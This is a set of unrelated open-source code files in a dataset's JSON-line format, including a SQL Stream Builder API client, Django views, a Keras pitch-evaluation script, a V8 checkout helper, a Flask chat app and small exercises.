for v in version_match.groups()[0].split('.')]\n\n\ndef is_csa16_or_later():\n return _get_csa_version() >= [1, 6]\n\n\ndef is_ssb_installed():\n return len(cm.get_services('SQL_STREAM_BUILDER')) > 0\n\n\ndef create_data_provider(provider_name, provider_type, properties):\n if is_csa16_or_later():\n provider_type_attr = 'type'\n else:\n provider_type_attr = 'provider_type'\n data = {\n 'name': provider_name,\n provider_type_attr: provider_type,\n 'properties': properties,\n }\n if is_csa16_or_later():\n return _api_post('/internal/external-provider', data, api_type=_API_INTERNAL, token=True)\n else:\n return _api_post('/external-providers', data)\n\n\ndef get_data_providers(provider_name=None):\n if is_csa16_or_later():\n resp = _api_get('/internal/external-provider', api_type=_API_INTERNAL)\n providers = resp.json()\n else:\n resp = _api_get('/external-providers')\n providers = resp.json()['data']['providers']\n return [p for p in providers if provider_name is None or p['name'] == provider_name]\n\n\ndef delete_data_provider(provider_name):\n assert provider_name is not None\n for provider in get_data_providers(provider_name):\n if is_csa16_or_later():\n _api_delete('/internal/external-provider/{}'.format(provider['provider_id']), api_type=_API_INTERNAL, token=True)\n else:\n _api_delete('/external-providers/{}'.format(provider['provider_id']))\n\n\ndef detect_schema(provider_name, topic_name):\n provider_id = get_data_providers(provider_name)[0]['provider_id']\n if is_csa16_or_later():\n raw_json = _api_get('/internal/kafka/{}/schema?topic_name={}'.format(provider_id, topic_name)).text\n return json.dumps(json.loads(raw_json), indent=2)\n else:\n return json.dumps(_api_get('/dataprovider-endpoints/kafkaSample/{}/{}'.format(provider_id, topic_name)).json()['data'], indent=2)\n\n\ndef create_kafka_table(table_name, table_format, provider_name, topic_name, schema=None, transform_code=None,\n timestamp_column=None, rowtime_column=None, watermark_seconds=None,\n kafka_properties=None):\n assert table_format in ['JSON', 'AVRO']\n assert table_format == 'JSON' or schema is not None\n provider_id = 
get_data_providers(provider_name)[0]['provider_id']\n if table_format == 'JSON' and schema is None:\n schema = detect_schema(provider_name, topic_name)\n data = {\n 'type': 'kafka',\n 'table_name': table_name,\n 'transform_code': transform_code,\n 'metadata': {\n 'topic': topic_name,\n 'format': table_format,\n 'endpoint': provider_id,\n 'watermark_spec': {\n 'timestamp_column': timestamp_column,\n 'rowtime_column': rowtime_column,\n 'watermark_seconds': watermark_seconds,\n },\n 'properties': kafka_properties or {},\n \"schema\": schema,\n }\n }\n if is_csa16_or_later():\n return _api_post('/internal/data-provider', data, api_type=_API_INTERNAL, token=True)\n else:\n return _api_post('/sb-source', data, token=True)\n\n\ndef get_tables(table_name=None, org='ssb_default'):\n if is_csa16_or_later():\n data = _api_get('/internal/catalog/tables-tree').json()\n assert 'tables' in data\n if 'ssb' in data['tables'] and org in data['tables']['ssb']:\n tables = data['tables']['ssb'][org]\n else:\n tables = []\n else:\n resp = _api_get('/sb-source')\n tables = resp.json()['data']\n return [t for t in tables if table_name is None or t['table_name'] == table_name]\n\n\ndef delete_table(table_name):\n assert table_name is not None\n for table in get_tables(table_name):\n if is_csa16_or_later():\n _api_delete('/internal/data-provider/{}'.format(table['id']), token=True)\n else:\n _api_delete('/sb-source/{}'.format(table['id']), token=True)\n\n\ndef execute_sql(stmt, job_name=None, parallelism=None, sample_interval_millis=None, savepoint_path=None,\n start_with_savepoint=None):\n if not job_name:\n job_name = 'job_{}_{}'.format(uuid.uuid1().hex[0:4], int(1000000*time.time()))\n data = {\n 'sql': stmt,\n 'job_parameters': {\n 'job_name': job_name,\n # 'snapshot_config': {\n # 'name': 'string',\n # 'key_column_name': 'string',\n # 'api_key': 'string',\n # 'recreate': true,\n # 'ignore_nulls': true,\n # 'enabled': true\n # },\n 'parallelism': parallelism,\n 'sample_interval_millis': sample_interval_millis,\n 'savepoint_path': savepoint_path,\n 'start_with_savepoint': start_with_savepoint\n },\n 'execute_in_session': True\n }\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n return _api_post('/ssb/sql/execute', data, headers=headers, api_type=_API_EXTERNAL)\n\n\ndef get_jobs(state='RUNNING'):\n resp = _api_get('/ssb/jobs', api_type=_API_EXTERNAL)\n return [j for j in resp.json()['jobs'] if state is None or j['state'] == state]\n\n\ndef stop_job(job_name, savepoint=False, savepoint_path=None, timeout=1000, wait_secs=0):\n data = {\n 'savepoint': savepoint,\n 'savepoint_path': savepoint_path,\n 'timeout': timeout,\n }\n resp = _api_post('/ssb/jobs/{}/stop'.format(job_name), api_type=_API_EXTERNAL, data=data)\n while True:\n jobs = get_jobs()\n if not any(j['name'] == job_name for j in jobs):\n break\n time.sleep(1)\n\n # additional wait in case we need to ensure the release of resources, like replication slots\n time.sleep(wait_secs)\n\n return resp\n\n\ndef stop_all_jobs():\n for job in get_jobs():\n stop_job(job['name'])\n\n\ndef upload_keytab(principal, keytab_file):\n global _SSB_CSRF_TOKEN\n data = {\n 'keytab_principal': principal,\n 'csrf_token': _SSB_CSRF_TOKEN,\n }\n files = {'keytab_file': (os.path.basename(keytab_file), open(keytab_file, 'rb'), 'application/octet-stream')}\n return _api_post('/keytab/upload', api_type=_API_UI, data=data, files=files, 
token=True)\n","sub_path":"setup/terraform/resources/labs/utils/ssb.py","file_name":"ssb.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"327631313","text":"from django.shortcuts import render\nfrom rest_framework.generics import ListAPIView,RetrieveAPIView,RetrieveUpdateAPIView,DestroyAPIView,CreateAPIView\nfrom .serializers import Etiqueta,EtiquetaSerializer\nfrom apps.user.permissions import IsOwner\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.mixins import DestroyModelMixin,UpdateModelMixin\n\n\n\n\nclass EtiquetaList(ListAPIView):\n serializer_class = EtiquetaSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self,*args,**kwargs):\n queryset_list = Etiqueta.objects.filter(user = self.request.user)\n return queryset_list\n\n\nclass EtiquetaCreate(CreateAPIView):\n queryset = Etiqueta.objects.all()\n serializer_class = EtiquetaSerializer\n permission_classes = [IsAuthenticated]\n\n def perform_create(self,serializer):\n serializer.save(user = self.request.user)\n\n\nclass EtiquetaDetail(DestroyModelMixin, UpdateModelMixin, RetrieveAPIView):\n queryset = Etiqueta.objects.all()\n lookup_field = \"pk\"\n serializer_class = EtiquetaSerializer\n permission_classes = [IsAuthenticated,IsOwner]\n\n def put(self,request,*args,**kwargs):\n return self.update(request,*args,**kwargs)\n\n def delete(self,request,*args,**kwargs):\n return self.destroy(request,*args,**kwargs)\n\n\n\n","sub_path":"apps/etiqueta/APIviews.py","file_name":"APIviews.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"281406728","text":"import argparse\nimport gzip\nimport os\nimport sys\n\nimport matplotlib.cm\nfrom mir_eval.melody import *\nfrom numpy.lib.stride_tricks import as_strided\nfrom resampy import resample\nfrom scipy.io import wavfile\n\nfrom datasets import to_local_average_cents, to_viterbi_cents\n\nparser = argparse.ArgumentParser()\nparser.add_argument('model',\n help='path to the HDF5 file that contains the Keras model')\nparser.add_argument('input_path',\n help='path that contains .wav or .npy.gz files to run the model on')\nparser.add_argument('output_path', nargs='?', default=None,\n help='path to save the prediction and salience results (default: same as input_path)')\nparser.add_argument('--save-numpy', action='store_true',\n help='save the salience representation to .npy file as well')\nparser.add_argument('--truth-path', default=None,\n help='path to the corresponding .csv or .npy.gz files that contains the ground-truth annotations')\nparser.add_argument('--viterbi', action='store_true',\n help='run Viterbi decoding for finding the center frequencies')\nargs = parser.parse_args()\n\nif args.output_path is None:\n args.output_path = args.input_path\n\n\ndef wav_stream(files):\n for file in files:\n srate, data = wavfile.read(os.path.join(args.input_path, file))\n if len(data.shape) == 2:\n data = data.mean(axis=1)\n if srate != 16000:\n data = resample(data, srate, 16000)\n srate = 16000\n hop_length = int(srate / 100)\n n_frames = 1 + int((len(data) - 1024) / hop_length)\n frames = as_strided(data, shape=(1024, n_frames),\n strides=(data.itemsize, hop_length * data.itemsize))\n frames = frames.transpose().astype(np.float32)\n yield (file, frames)\n\n\ndef npygz_stream(files):\n for file in files:\n with gzip.open(os.path.join(args.input_path, file)) 
as f:\n            yield (file, np.load(f).transpose())\n\n\nfiles = [file for file in os.listdir(args.input_path) if file.lower().endswith('.wav')]\nfiles.sort()\nnum_files = len(files)\nif num_files > 0:\n    print(num_files, \"wav files found\")\n    stream = wav_stream(files)\nelse:\n    files = [file for file in os.listdir(args.input_path) if file.lower().endswith('.npy.gz')]\n    files.sort()\n    num_files = len(files)\n    if num_files > 0:\n        print(num_files, \".npy.gz files found\")\n        stream = npygz_stream(files)\n    else:\n        raise ValueError(\"No .wav or .npy.gz files found in \" + args.input_path)\n\n\nimport keras  # noqa\n\nmodel = keras.models.load_model(args.model)\nmodel.summary()\n\ninferno = matplotlib.cm.get_cmap('inferno')\nviridis = matplotlib.cm.get_cmap('viridis')\njet = matplotlib.cm.get_cmap('jet')\n\n\naccuracy_files = [os.path.join(args.output_path, 'accuracies-%.2f.csv' % f) for f in np.arange(0.40, 0.95, 0.05)]\nfor accuracy_file in accuracy_files:\n    with open(accuracy_file, \"w\") as f:\n        print(\"NAME,RPA,RCA,VR,VFA,OA\", file=f)\n\n\ndef report_accuracy(name, truth, estimated, confidence):\n    for accuracy_file, tau in zip(accuracy_files, np.arange(0.40, 0.95, 0.05)):\n        ref_voicing = truth != 0\n        est_voicing = confidence > tau\n\n        rpa = raw_pitch_accuracy(ref_voicing, truth, est_voicing, estimated)\n        rca = raw_chroma_accuracy(ref_voicing, truth, est_voicing, estimated)\n        recall, false_alarm = voicing_measures(ref_voicing, est_voicing)\n        oa = overall_accuracy(ref_voicing, truth, est_voicing, estimated)\n\n        with open(accuracy_file, \"a\") as f:\n            print(\"{},{},{},{},{},{}\".format(name, rpa, rca, recall, false_alarm, oa), file=f)\n\n\nfor name, data in stream:\n    print('processing', name, 'of shape', data.shape)\n    data -= np.mean(data, axis=1)[:, np.newaxis]\n    data /= np.std(data, axis=1)[:, np.newaxis]\n    predictions = model.predict(data, verbose=True)\n    if args.viterbi:\n        cents = to_viterbi_cents(predictions)\n    else:\n        cents = to_local_average_cents(predictions)\n    confidence = np.max(predictions, axis=1)\n    hertz = 10.0 * 2 ** (cents / 1200.0)\n    timestamps = 0.01 * np.array(range(hertz.shape[0]))\n    result = np.vstack([timestamps, hertz, confidence]).transpose()\n    result_file = os.path.join(args.output_path, name + '.f0.csv')\n    np.savetxt(result_file, result, fmt='%.6f', delimiter=',', header='time,frequency,confidence')\n\n    if args.save_numpy:\n        salience_file = os.path.join(args.output_path, name + '.salience.npy')\n        np.save(salience_file, predictions)\n\n    predictions = np.flip(predictions, axis=1)  # to draw the low pitches in the bottom\n\n    figure_file = os.path.join(args.output_path, name + '.salience.png')\n    image = inferno(predictions.transpose())\n    image = np.pad(image, [(0, 20), (0, 0), (0, 0)], mode='constant')\n    image[-20:-10, :, :] = viridis(confidence)[np.newaxis, :, :]\n    image[-10:, :, :] = viridis((confidence > 0.5).astype(float))[np.newaxis, :, :]\n    # NOTE: scipy.misc.imsave/imread require an explicit \"import scipy.misc\" and SciPy < 1.2, where they still exist\n    scipy.misc.imsave(figure_file, 255 * image)\n\n    if args.truth_path:\n        basename = name.replace('.npy.gz', '')\n        csv_path = os.path.join(args.truth_path, basename + '.csv')\n        npygz_path = os.path.join(args.truth_path, basename + '.npy.gz')\n        if os.path.isfile(csv_path):\n            truth = np.loadtxt(csv_path)\n        elif os.path.isfile(npygz_path):\n            with gzip.open(npygz_path) as f:\n                truth = np.load(f)\n        else:\n            print('truth file for {} not found'.format(name), file=sys.stderr)\n            continue  # skip evaluation for this file; 'truth' would be undefined below\n        truth = hz2cents(truth)\n        report_accuracy(name, truth, cents, confidence)\n\n        image = scipy.misc.imread(figure_file, mode='RGB')\n        image = np.pad(image, [(20, 0), (0, 0), (0, 
0)], mode='constant')\n\n        for i in range(image.shape[1]):\n            if truth[i] < 1:\n                continue  # no-voice\n            image[:20, i, :] = 255 * np.array(jet(int(abs(truth[i] - cents[i]))))[:3]\n\n        scipy.misc.imsave(figure_file.replace('.png', '.eval.png'), image)\n","sub_path":"runmodel.py","file_name":"runmodel.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"257178250","text":"#!/usr/bin/env python3\n\n# Author: Jamie Giannini\n\n# Objectives: Create a Python script that performs the following:\n\n# [X] Prompt the user to type a string input as the variable for your destination URL\n# [X] Prompt the user to select a HTTP Method of the following options:\n# [X] GET\n# [X] POST\n# [X] PUT\n# [X] DELETE\n# [X] HEAD\n# [X] PATCH\n# [X] OPTIONS\n# [X] Print to the screen the entire request your script is about to send. Ask the user to confirm before proceeding.\n# [X] Using the requests library, perform a GET request against your lab web server.\n# [X] For the given header, translate the codes into plain terms that print to the screen; for example, a ‘404’ error should print ‘Site not found’ to the terminal instead of ‘404’.\n# [X] For the given URL, print response header information to the screen\n\nimport requests  # imports the necessary HTTP library\n\ndef run_request():\n    destination_flag = 0\n    r = True\n    user_destination = input(\"\\nPlease enter a destination URL:\\n\")\n    user_method = input(\"\\nChoose a HTTP Method: [G] GET | [P] POST | [PU] PUT | [D] DELETE | [H] HEAD | [PA] PATCH | [O] OPTIONS | [Q] Quit:\\n\")\n\n    while r:\n        if destination_flag == 0:\n            print(\"\\nPlease confirm the following details: \")\n\n            print(\"Your destination: \" + user_destination)\n            # Translates entry into full name for better UX\n            if user_method == \"G\" or user_method == \"g\":\n                user_method_easy = \"GET\"\n            elif user_method == \"P\" or user_method == \"p\":\n                user_method_easy = \"POST\"\n                print(\"(Note: Since you selected POST, for testing purposes we will use https://httpbin.org/post)\")\n            elif user_method == \"PU\" or user_method == \"pu\":\n                user_method_easy = \"PUT\"\n            elif user_method == \"D\" or user_method == \"d\":\n                user_method_easy = \"DELETE\"\n            elif user_method == \"H\" or user_method == \"h\":\n                user_method_easy = \"HEAD\"\n            elif user_method == \"PA\" or user_method == \"pa\":\n                user_method_easy = \"PATCH\"\n            elif user_method == \"O\" or user_method == \"o\":\n                user_method_easy = \"OPTIONS\"\n            elif user_method == \"Q\" or user_method == \"q\":\n                break\n            else:\n                # Guard against unrecognized input; without this, user_method_easy is undefined below\n                print(\"\\nUnrecognized HTTP Method selection.\")\n                destination_flag = 2\n                continue\n\n            print(\"Your chosen HTTP Method: \" + user_method_easy)\n\n            user_choice = input(\"\\nSelect: [1] edit destination | [2] edit HTTP Method | [3] Continue:\\n\")\n\n            if user_choice == \"1\":\n                destination_flag = 1\n                continue\n            elif user_choice == \"2\":\n                destination_flag = 2\n                continue\n            elif user_choice == \"3\":\n                destination_flag = 3\n                continue\n\n        elif destination_flag == 1:\n            user_destination = input(\"\\nPlease enter a destination URL:\\n\")\n            destination_flag -= 1\n            continue\n\n        elif destination_flag == 2:\n            user_method = input(\"\\nChoose a HTTP Method: [G] GET | [P] POST | [PU] PUT | [D] DELETE | [H] HEAD | [PA] PATCH | [O] OPTIONS | [Q] Quit:\\n\")\n            destination_flag -= 2\n            continue\n\n        # Perform request\n        elif destination_flag == 3:\n            if user_method == \"G\" or user_method == \"g\":\n                reply = requests.get(\"http://\" + user_destination)\n                print(\"\\nResults:\")\n                if reply.status_code == 200:\n                    print(\"Success!\")\n                    print(\"\\nHeader data: 
\\n\"+str(reply.headers))  # Also print request header data\n                elif reply.status_code == 301:\n                    print(\"Moved Permanently.\")\n                elif reply.status_code == 302:\n                    print(\"Moved Temporarily.\")\n                elif reply.status_code == 403:\n                    print('Forbidden.')\n                elif reply.status_code == 404:\n                    print('Site Not Found.')\n                elif reply.status_code == 500:\n                    print('Internal Server Error.')\n                elif reply.status_code == 503:\n                    print('Server Unavailable.')\n                else:\n                    print(\"Error\")\n                break\n            # Playing with POST\n            elif user_method == \"P\" or user_method == \"p\":\n                get_key = input(\"\\nProvide a key:\\n\")\n                get_value = input(\"\\nProvide a value:\\n\")\n                # Using HTTPbin for testing\n                reply = requests.post('https://httpbin.org/post', data={get_key: get_value})\n                print(\"\\nHeaders: \" + str(reply.request.headers))\n                print(\"\\nURL: \" + str(reply.request.url))\n                print(\"\\nBody: \" + str(reply.request.body))\n                break\n            # Catch-all for anything not GET or POST for now\n            elif user_method != \"G\" and user_method != \"g\" and user_method != \"P\" and user_method != \"p\":\n                print(\"Other HTTP Methods Still In Development. Coming soon!\")\n                break\n\n# main\nrun_request()\n\n# Resource: https://realpython.com/python-requests/#the-get-request\n","sub_path":"ops_challenge_12.py","file_name":"ops_challenge_12.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"285634487","text":"# Checking out the V8 source code: https://v8.dev/docs/source-code\n\nfrom .common import *\nimport sys\nimport os\nimport shutil\nimport urllib.request\n\ndef install_depot_tools(root=os.getcwd(), skip_install_if_exists=True):\n    out_path = os.path.join(root, \"depot_tools\")\n    if os.path.exists(out_path):\n        if os.path.isdir(out_path):\n            if not skip_install_if_exists:\n                # recursively delete the existing checkout (the directory is typically non-empty)\n                shutil.rmtree(out_path)\n        else:\n            os.remove(out_path)\n    if os.path.exists(out_path) and skip_install_if_exists:\n        return out_path\n    if sys.platform == \"win32\":\n        url = \"https://storage.googleapis.com/chrome-infra/depot_tools.zip\"\n        zip_path = os.path.join(root, \"depot_tools.zip\")\n        with urllib.request.urlopen(url) as i:\n            with open(zip_path, \"wb\") as o:\n                o.write(i.read())\n        shutil.unpack_archive(zip_path, out_path)\n        os.remove(zip_path)\n    else:\n        url = \"https://chromium.googlesource.com/chromium/tools/depot_tools.git\"\n        run(\"git\", \"clone\", url, cwd=root)\n    return out_path\n\ndef update_depot_tools(root=os.getcwd()):\n    run_cmd(\"gclient\", cwd=root, root=root)\n\ndef v8_src_downloaded(root=os.getcwd()):\n    gclient_path = os.path.join(root, \".gclient\")\n    if os.path.exists(gclient_path):\n        with open(gclient_path, \"r\") as gclient:\n            return gclient.read().find('\"name\": \"v8\"') != -1\n    return False\n\ndef get_v8_src_code(root=os.getcwd()):\n    run_cmd(\"fetch\", \"v8\", cwd=root, root=root, print_result=True)\n\ndef download_all_build_deps(root=os.getcwd()):\n    run_cmd(\"gclient\", \"sync\", cwd=root, root=root, print_result=True)\n\ndef switch_to_version(version, root=os.getcwd()):\n    v8_path = os.path.join(root, \"v8\")\n    run_cmd(\"git\", \"checkout\", \"tags/{0}\".format(version), cwd=v8_path, root=root, print_result=True)\n\ndef download_additional_build_deps(root=os.getcwd()):\n    if sys.platform == \"linux\":\n        script_path = os.path.join(root, \"v8\", \"build\", \"install-build-deps.sh\")\n        run_cmd(script_path, cwd=root, root=root, print_result=True)\n\ndef checkout(version, root=os.getcwd()):\n    print_colored(\"Checking out the V8 source code...\")\n    
print_colored(\"See https://v8.dev/docs/source-code for more information.\")\n if not v8_src_downloaded(root=root):\n print_colored(\"Installing depot_tools...\")\n install_depot_tools(root=root)\n print_colored(\"Updating depot_tools... This may take some time.\")\n update_depot_tools(root=root)\n print_colored(\"Retrieving V8 source code...\")\n get_v8_src_code(root=root)\n print_colored(\"Downloading all the build dependencies...\")\n download_all_build_deps(root=root)\n print_colored(\"Downloading additional build dependencies...\")\n download_additional_build_deps(root=root)\n print_colored(\"Switch to version {0}\".format(version))\n switch_to_version(version, root=root)\n","sub_path":"bootstrap/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"617333899","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom .models import Reservation\n\n\nclass ReservationForm(forms.ModelForm):\n class Meta:\n model = Reservation\n fields = ('amount', 'email', 'message', 'title', 'location')\n error_messages = {\n 'sender': {\n 'invalid': _('Enter a valid email address.'),\n 'required': _('Enter a valid email address.')\n }\n }\n","sub_path":"server/prices/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"404612336","text":"from openpyxl import Workbook\n\nwb = Workbook()\nsheet = wb.active\nsheet.title = \"New Shit\"\nsheet['C3'] = 'Hello world!'\nfor i in range(10):\n sheet[\"A%d\" % (i + 1)].value = i + 1\n\nwb.save('保存一个新的excel.xlsx')\n","sub_path":"aaaaaa/scrabe/excel-test.py","file_name":"excel-test.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"502050298","text":"####################################################\n# Copyright (C) 2019 Sam Pickell\n# Last Updated December 9, 2019\n# Draw_and_Get_Coord.py\n####################################################\n# The following Turtle Graphics implementation was obtained from this tutorial:\n# https://techwithtim.net/tutorials/python-module-walk-throughs/turtle-module/drawing-with-mouse/\n# It has been modified and added to so that it reports the mouse's coordinates when drawing\n\n# Using Turtle Graphics\nimport turtle\nfrom turtle import *\n\n# Global variable that sets the number of datapoints to collect\nLOOP_THRESHOLD = 20\n\n# Create screen and turtle variables\nout_screen = Screen()\nmy_turtle = Turtle(\"turtle\")\nmy_turtle.speed(-1)\n\n# Create two lists to store X and Y coordinates\nx_coords = []\ny_coords = []\n\n# Draw function\ndef turtle_draw(x, y):\n my_turtle.ondrag(None)\n my_turtle.setheading(my_turtle.towards(x, y))\n my_turtle.goto(x, y)\n my_turtle.ondrag(turtle_draw)\n\n # Ensure 0 is always positive\n if(x == -0.0):\n x = 0.0\n\n # Append the x coordinate to the end of the list\n x_coords.append(x)\n\n # Ensure 0 is always positive\n if(y == -0.0):\n y = 0.0\n\n # Append the y coordinate to the end of the list\n y_coords.append(y)\n\n # End drawing session after a certain threshold is reached\n if(len(x_coords) >= LOOP_THRESHOLD):\n turtle.bye()\n\n\n# The main function\ndef main():\n\n turtle.listen()\n\n my_turtle.ondrag(turtle_draw)\n\n out_screen.mainloop()\n\nmain()\nprint('X coordinates: ', len(x_coords))\nprint('Y 
coordinates: ', len(y_coords))\n","sub_path":"Draw_and_Get_Coord.py","file_name":"Draw_and_Get_Coord.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"17431699","text":"#Designer: Andreas Slyngstad\n#Progamming Language: Python\n#Solver of the Navier-Stokes equation using Chorins method\nfrom dolfin import *\na, b = 1, 5.0\nnx = 10 # Nodes in x direction\nny = 10 # Nodes in y direction\ntop = 1\n#Define Mesh and Functions\nmesh = RectangleMesh(1, 0, 4, top, nx, ny, \"crossed\")\nV = VectorFunctionSpace(mesh, 'CG', 2)\nu = TrialFunction(V)\nv = TestFunction(V)\n\n#Variational Problem\na = inner(nabla_grad(u), nabla_grad(v))*dx \nL = inner(Constant((0.0,0.0)),v)*dx\n\n#Boundary Conditions\nclass Top(SubDomain):\n\tdef inside(self, x, on_boundary):\n\t\ttol = 1E-14\n\t\treturn on_boundary and x[1] > 1-tol \n\nclass Bottom(SubDomain):\n\tdef inside(self, x, on_boundary):\n\t\ttol = 1E-14\n\t\treturn on_boundary and x[1] < tol\n\n#Test position of boundary plot(boundaries); interactive()\ntop = Top() ;bottom = Bottom()\nboundaries = FacetFunction('size_t', mesh)\nboundaries.set_all(0)\ntop.mark(boundaries,1); bottom.mark(boundaries,2)\n\nbctop = DirichletBC(V, Constant((1.0,0.0)), boundaries, 1)\nbcbottom = DirichletBC(V, Constant((0.0,0.0)),boundaries, 2)\nbcs = [bctop, bcbottom]\n\nu_ = Function(V)\nsolve(a == L, u_, bcs)\n\nplot(u_)\ninteractive()\n","sub_path":"NavierStokes/Navier.py","file_name":"Navier.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"373142065","text":"import os\n\nfrom flask import Flask,render_template,request, redirect,url_for,jsonify\n\nfrom flask_socketio import SocketIO, emit\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\nchannels={} #Dict of lists, key-channel-username, value-list of messages\n\n@app.route(\"/\",methods=['GET','POST'])\ndef index():\n log_in_message=''\n username=request.form.get('username')\n if username not in channels:\n channels[username]=[]\n return redirect(url_for('chat'))\n else:\n log_in_message='You need to enter valid username'\n return render_template ('index.html', log_in_message=log_in_message)\n\n@app.route(\"/chat\",methods=['GET','POST'])\ndef chat():\n return render_template ('chatroom.html',chats=channels)\n\n@app.route(\"/my\",methods=['GET','POST'])\ndef my():\n data=channels\n return render_template ('channel2.html',data=data) \n\n# @app.route(\"/posts\",methods=['POST'])\n# def posts():\n# username=request.get_json(force=True, silent=True)['username'] \n# data=channels[username]\n# # return jsonify(data)\n# return render_template ('channel2.html', data=data) \n \n\n@socketio.on(\"new_messages\")\ndef message(json,methods=['GET','POST']):\n username=json['username']\n message=json['message']\n channels[username].append(message)\n print(channels)\n socketio.emit('response',json,broadcast=True)\n \n \n ","sub_path":"project2/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"109810858","text":"import numpy as np\nimport pandas as pd\nfrom collections import defaultdict, Counter\nfrom scipy.optimize import minimize\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, 
StandardScaler\n\n#######\n\nclass simulation:\n def __init__(self, optimal_decision_rule, Q0, VF, objective_function, x_distr, balanced = False, n=2000):\n self.O = optimal_decision_rule\n self.Q0 = Q0\n self.VF = VF\n self.objective_function = objective_function\n self.x_distr = x_distr\n self.X_dict = defaultdict(list)\n self.X_dict_train = {}\n self.X_dict_val = {}\n self.X_dict_test = {}\n self.X_scaled_dict = defaultdict(list)\n self.y_dict = {}\n self.rewards_dict = {}\n self.total_rewards_dict = {}\n self.optimal_dict = {}\n self.optimal_decisions_dict = {}\n self.propensity_scores = {i: 0.5 for i in range(n)}\n self.scaler = MinMaxScaler()\n self.n = n\n self.l = None\n self.S = None\n self.smooth_clip = False\n self.intercept = False\n self.penalty_norm = False\n self.miss_min = []\n self.beta_callback = []\n self.balanced = balanced\n \n def generate_data(self, *x_distr_args):\n np.random.seed(48)\n for i in range(self.n):\n if self.balanced:\n num_measurements = 4\n else:\n num_measurements = int(np.random.uniform(1, 5, 1)[-1])\n self.X_dict[i] = self.x_distr(*x_distr_args, size = (num_measurements, 3))\n self.y_dict[i] = np.sign(np.random.binomial(1, 0.5, num_measurements))\n self.optimal_dict[i] = np.array([self.O(x) for x in self.X_dict[i]])\n self.optimal_decisions_dict[i] = np.array([np.sign(x) for x in self.optimal_dict[i]])\n self.rewards_dict[i] = [np.random.normal(self.Q0(x, o, a), 1) \n for x, o, a in zip(self.X_dict[i], self.optimal_decisions_dict[i], self.y_dict[i])]\n self.total_rewards_dict[i] = np.sum(self.rewards_dict[i])\n\n x_master = self.X_dict[0]\n for k in range(1, self.n):\n x_master = np.concatenate([x_master, np.array(self.X_dict[k])], axis = 0) \n self.scaler.fit(x_master) \n for k in self.X_dict:\n self.X_scaled_dict[k] = self.scaler.transform(np.array(self.X_dict[k]))\n\n \n def obtain_results(self, betas, X_dict_test, correct_min_count = None):\n X_dict_test_original = {k: self.X_dict[k] for k in X_dict_test}\n optimal_vf = self.VF(X_dict_test_original, X_dict_test_original, self.O)\n obs_vf = self.VF(X_dict_test_original, X_dict_test_original, lambda x, pid, idx: self.y_dict[pid][idx])\n assign_rate = round(np.sum([np.sum(self.optimal_decisions_dict[k] > 0) for k in self.optimal_decisions_dict]) /\\\n sum([len(o) for o in self.optimal_decisions_dict.values()]) * 100, 2)\n \n if not self.intercept:\n estimated_vf = self.VF(X_dict_test_original, X_dict_test, lambda x, pid, idx: np.dot(betas, x))\n success_rate = round(np.sum([np.all(np.sign(X_dict_test[k].dot(betas)) == self.optimal_decisions_dict[k]) \n for k in X_dict_test]) / len(X_dict_test) * 100, 2)\n else:\n estimated_vf = self.VF(X_dict_test_original, X_dict_test, lambda x, pid, idx: np.dot(betas, np.hstack([1, x])))\n success_rate = round(np.sum([np.all(np.sign(np.concatenate([np.ones(shape=(X_dict_test[k].shape[0], 1)),\n X_dict_test[k]], axis = 1).dot(betas)) == self.optimal_decisions_dict[k]) \n for k in X_dict_test]) / len(X_dict_test) * 100, 2)\n min_accuracy = round(correct_min_count[1] / correct_min_count[0] * 100, 2) if correct_min_count is not None else np.nan\n result_df = pd.DataFrame({\"l\": [self.l],\n 'S': [self.S],\n 'MinAccuracy': [min_accuracy],\n \"Assign_Rate\": [assign_rate], \n \"Accuracy\": [success_rate], \n \"OptimalVF\": [optimal_vf],\n \"EstimatedVF\": [estimated_vf], \n \"ObservedVF\": [obs_vf],\n 'Betas': \" \".join([str(round(b, 2)) for b in betas])})\n return result_df\n\n\n def optimize(self, l = 0.5, S=1, x0=None, verbose = False, scale = False, smooth_clip = 
